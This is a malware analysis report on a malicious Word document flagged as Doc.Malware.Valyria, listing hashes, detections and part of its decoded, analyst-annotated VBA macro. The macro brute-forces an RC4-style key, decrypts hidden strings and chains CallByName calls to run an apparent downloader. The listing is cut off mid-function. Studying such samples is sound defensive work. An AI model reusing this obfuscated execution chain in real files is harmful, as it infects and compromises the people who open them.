Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 020ba5a273c0992d…

MALICIOUS

Office (OLE)

95.5 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 1ded730be82850f1a78304be76ac7f4f SHA-1: d7350270b605b73f617be77fe36d3968388a3b80 SHA-256: 020ba5a273c0992d62faa05144aed7f174af64c836bf82009ada46f1ce3b6eee
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing a large VBA macro. Heuristics indicate the use of GetObject and CallByName, common techniques for executing embedded code. The macro itself appears to be heavily obfuscated but is likely designed to download and execute a second-stage payload, as suggested by the ClamAV detection name 'Doc.Malware.Valyria'. The extracted 'macros.bas' artifact (the decoded VBA source carved from the document by olevba) further confirms the macro-based nature of the attack.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28563 bytes
SHA-256: f8c45f5bd6784b0941636dbcc964194065d4541c8fcba8c2a0908cbf5aeb235f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
' Analyst notes (added during review; the sample's own statements are unchanged).
' VB_Control declares an MSForms Frame named "sub1"; Sub1_Layout below is that
' control's Layout event handler and is the only entry point in the visible part
' of the listing (no AutoOpen / Document_Open is visible).
' Module-level state used by the obfuscated macro:
' - dim5: run-once flag, checked and set in Sub1_Layout.
' - dim41(1 To 255): identity lookup table (dim41(i) = i), filled in dim09; the
'   constant-table subs read every byte through it, so dim41(n) is simply n.
' - dim7(0..5): 6-byte key buffer passed to the key-schedule function dim9.
'   Note that dim09 also writes dim7(6), which lies outside this declared bound.
' - dim70(0..16) and dim91(0..16): 17-byte compare target and encoded input for
'   the key search in dim09 (loaded by dim47 and dim67).
' - dim8, dim23, dim24, dim33, dim50, dim61, dim89: encoded byte tables that dim95
'   decodes at runtime into strings passed to dim72 and used as CallByName
'   procedure names; dim50 (806 bytes) becomes the argument of the final call.
Dim dim5, dim8(2) As Byte, dim58(9) As Byte, dim23(32) As Byte, dim24(19) As Byte, dim61(13) As Byte, dim7(5) As Byte, dim33(55) As Byte, dim50(805) As Byte, dim89(5) As Byte, dim91(16) As Byte, dim70(16) As Byte, dim41(1 To 255) As Byte
Private Function dim09()
' Key-search driver (name obfuscated). Fills the identity table, loads the
' constant tables, then counts dim80 upward, deriving a candidate key from the
' counter on each round, until dim11() reports that dim91 transformed under that
' key matches dim70. On success the payload routine dim95 is called.
' dim49, dim40 and dim11 are defined outside the visible listing; what is said
' about them below is inferred from their use here and should be confirmed.
Dim dim80, dim82, dim27, dim32() As Byte, dim85, dim69
dim69 = 1
' 353940 / 1388 = 255: dim41(1..255) becomes the identity mapping.
While dim69 <= (353940 / 1388)
dim41(dim69) = dim69
dim69 = dim69 + 1
Wend
dim47   ' loads the 17-byte compare target dim70
dim67   ' loads the 17-byte encoded input dim91
dim85 = (626944 / 2449)   ' = 256
dim26   ' seeds dim7(0), dim7(1) with ASCII "D", "0"
' dim80 and dim82 start as Empty (compared as 0), so the loop runs until dim82 is set.
While dim82 = 0
' Assigning a String to a dynamic Byte array yields its UTF-16LE bytes, so dim32
' holds the decimal digits of the counter as 2-byte code units.
dim32 = CStr(dim80)
dim27 = dim49(dim32())   ' presumably the array's upper bound or length - confirm in dim49
' Re-pack up to five code units (low + high * 256) into dim7(2..6): the candidate
' key is "D0" followed by the counter's digits. The fifth digit writes dim7(6),
' which is past dim7's declared bound (0..5); with no On Error handler here that
' would raise a runtime error, so (if dim49 returns the upper bound) the search
' effectively covers counters below 10000.
If dim27 >= 1 Then
dim7(2) = dim32(0) + (dim32(1) * dim85)
If dim27 >= 3 Then
dim7(3) = dim32(2) + (dim32(3) * dim85)
If dim27 >= 5 Then
dim7(4) = dim32(4) + (dim32(5) * dim85)
If dim27 >= 7 Then
dim7(5) = dim32(6) + (dim32(7) * dim85)
If dim27 >= 9 Then
dim7(6) = dim32(8) + (dim32(9) * dim85)
End If
End If
End If
End If
End If
' dim9 builds the key schedule; dim40 presumably transforms dim91 under it and
' dim11 presumably compares the first 16 bytes with dim70, returning 1 on a match.
If dim11(dim40(dim91(), dim9(dim7()), 16), dim70, 16) = 1 Then
dim82 = 8195   ' sentinel: key found
End If
dim80 = dim80 + 1
Wend
' Barring a runtime error, the loop can only exit with dim82 = 8195, so the
' MsgBox branch is not reached in normal operation.
If dim82 = 8195 Then
dim95   ' run the decoded payload stage
Else
MsgBox dim82
End If
End Function
Private Function dim04(dim31, dim64, dim18, dim0, dim19, dim97)
' Thin wrapper around CallByName (the OLE_VBA_CALLBYNAME heuristic points here):
' invokes the procedure named dim64 on object dim31 with call type dim18 and the
' single argument dim19, returning the result as an object reference. dim0 and
' dim97 are accepted but never used. On Error GoTo the empty label dim92 swallows
' any failure, so on error the function simply returns its default (Empty) value.
On Error GoTo dim92
Set dim04 = CallByName(dim31, dim64, dim18, dim19)
dim92:
End Function
Private Function dim53(dim48() As Byte, dim08)
' Turns the byte array dim48 into a String: walks indices 0..dim08, stops at the
' first 0 byte, and appends dim77(byte) for each element. dim77 is not in the
' visible listing (presumably a Chr-style byte-to-character conversion - confirm).
' dim99 starts as Empty, i.e. index 0. On Error GoTo dim68 ends the function
' silently on any error (e.g. dim08 beyond the array bound), returning whatever
' was built so far.
Dim dim99, dim36
On Error GoTo dim68
While dim99 <= dim08
dim36 = dim48(dim99)
If dim36 = 0 Then
Exit Function   ' 0 byte acts as a string terminator
End If
dim53 = dim53 & dim77(dim36)
dim36 = 0
dim99 = dim99 + 1
Wend
dim68:
End Function
Private Sub dim95()
' Payload stage, reached from dim09 once the key search succeeds. Every string
' used here is decoded at runtime: dim40(table, dim16, n) transforms an n-byte
' table under the key schedule dim16 and dim53 turns the result into a String.
' dim72, dim40, dim44, dim13, dim96, dim79, dim22 and dim15 are outside the
' visible listing; from usage, dim72 returns an object from a decoded string
' (the OLE_VBA_GETOBJ heuristic likely refers to it - confirm) and the
' parameterless subs load the remaining encoded tables, as dim94 and dim62 do.
Dim dim16() As Byte
dim16 = dim9(dim7())   ' key schedule derived from the key found in dim09
dim44
Dim dim30
' First object, obtained from a 56-byte decoded string.
Set dim30 = dim72(dim53(dim40(dim33(), dim16(), 56), 56))
dim13
dim62
dim96
Dim dim45
' Largest decoded blob (806 bytes); it becomes the argument of the final call.
dim45 = dim53(dim40(dim50(), dim16(), 806), 806)
dim94
dim79
dim22
dim15
Dim dim86, dim39, dim35
' Chain of CallByName invocations through dim04 with call type 1 (vbMethod):
' the method named by the 3-byte table is called on dim30 with the 20-byte
' decoded string as argument, then the method named by the 14-byte table is
' called on that result.
Set dim86 = dim04(dim30, dim53(dim40(dim8(), dim16(), 3), 3), 1, 0, dim53(dim40(dim24(), dim16(), 20), 20), 0)
Set dim39 = dim04(dim86, dim53(dim40(dim61(), dim16(), 14), 14), 1, 0, 0, 0)
' Second object from a 33-byte decoded string; dim45 is passed to the method
' named by the 6-byte table dim89. dim39 lands in dim04's unused sixth parameter.
Set dim35 = dim72(dim53(dim40(dim23(), dim16(), 33), 33))
dim04 dim35, dim53(dim40(dim89(), dim16(), 6), 6), 1, 1, dim45, dim39
End Sub
Private Function dim9(dim56() As Byte) As Byte()
' Key-schedule function: builds a 256-entry permutation table from the 6-byte
' key dim56. The arithmetic is obfuscated: 6766 - 6511 = 255, -7454 + 7709 = 255,
' 8340 - 8084 = 256. dim98 is not visible; from its use as dim98(a, 6) and
' dim98(a, 256) it presumably reduces a modulo its second argument - confirm.
' Under that reading the loop (identity fill, then for each i:
' j = j + S(i) + key(i mod 6), swap S(i) and S(j)) matches the key-scheduling
' step of an RC4-style stream cipher, with dim40 presumably being the matching
' keystream/transform step. dim76 and dim03 start as Empty (0).
Dim dim90(0 To 255) As Byte, dim76, dim03, dim34 As Byte
' Identity fill of the state table.
While dim76 <= (6766 - 6511)
dim90(dim76) = dim76
dim76 = dim76 + 1
Wend
dim76 = 0
' Key-dependent swap pass over all 256 entries.
While dim76 <= (-7454 + 7709)
dim03 = dim98((dim03 + dim90(dim76) + dim56(dim98(dim76, 6))), (8340 - 8084))
dim34 = dim90(dim76)
dim90(dim76) = dim90(dim03)
dim90(dim03) = dim34
dim76 = dim76 + 1
Wend
dim9 = dim90
End Function
Private Sub dim47()
' Loads the 17-byte compare target dim70 through the identity table dim41
' (dim41(n) = n once dim09 has filled it, so each line stores the literal index).
' All stored values lie in 48..57 or 65..70, i.e. ASCII digits and A-F, so the
' target reads as a hex-digit string; the writes are deliberately out of index
' order to hinder reading.
dim70(8) = dim41(56)
dim70(5) = dim41(49)
dim70(15) = dim41(66)
dim70(6) = dim41(67)
dim70(0) = dim41(51)
dim70(10) = dim41(66)
dim70(14) = dim41(51)
dim70(7) = dim41(48)
dim70(3) = dim41(52)
dim70(1) = dim41(48)
dim70(2) = dim41(48)
dim70(9) = dim41(70)
dim70(4) = dim41(70)
dim70(16) = dim41(52)
dim70(11) = dim41(53)
dim70(12) = dim41(48)
dim70(13) = dim41(68)
End Sub
Private Sub dim26()
' Seeds the fixed prefix of the key buffer: dim7(0) = 68 ("D"), dim7(1) = 48 ("0").
' The remaining key bytes are filled from the counter digits in dim09.
dim7(1) = 48
dim7(0) = 68
End Sub
Private Sub dim67()
' Loads the 17-byte encoded input dim91 through the identity table dim41, in
' shuffled index order as in dim47. Unlike dim70, the values span the full byte
' range (e.g. 212, 176, 251), consistent with ciphertext that dim09 transforms
' under each candidate key and compares against dim70.
dim91(14) = dim41(53)
dim91(9) = dim41(212)
dim91(13) = dim41(68)
dim91(8) = dim41(176)
dim91(5) = dim41(73)
dim91(11) = dim41(251)
dim91(6) = dim41(157)
dim91(3) = dim41(189)
dim91(2) = dim41(181)
dim91(10) = dim41(114)
dim91(12) = dim41(28)
dim91(15) = dim41(189)
dim91(7) = dim41(58)
dim91(4) = dim41(210)
dim91(16) = dim41(44)
dim91(0) = dim41(30)
dim91(1) = dim41(151)
End Sub
Private Sub Sub1_Layout()
' Entry point: Layout event handler of the MSForms Frame "sub1" declared in the
' VB_Control attribute at the top of the module. The macro therefore starts from
' a form-control event rather than an AutoOpen / Document_Open handler (none is
' visible in the listing). dim5 is a run-once guard: Empty compares as 0 on the
' first entry, after which it is set to 83 so the key search in dim09 runs once.
If dim5 = 0 Then
dim5 = 83
dim09
End If
End Sub
Private Sub dim94()
' Loads the 6-byte encoded table dim89 through the identity table dim41, in
' shuffled index order. dim95 decodes it into the procedure name used in its
' final dim04 (CallByName) call.
dim89(3) = dim41(232)
dim89(2) = dim41(224)
dim89(1) = dim41(213)
dim89(0) = dim41(110)
dim89(5) = dim41(29)
dim89(4) = dim41(224)
End Sub
Private Sub dim62()
dim23(23) = dim41(71)
dim23(20) = dim41(159)
dim23(5) = dim41(21)
dim23(1) = dim41(206)
dim2
... (truncated)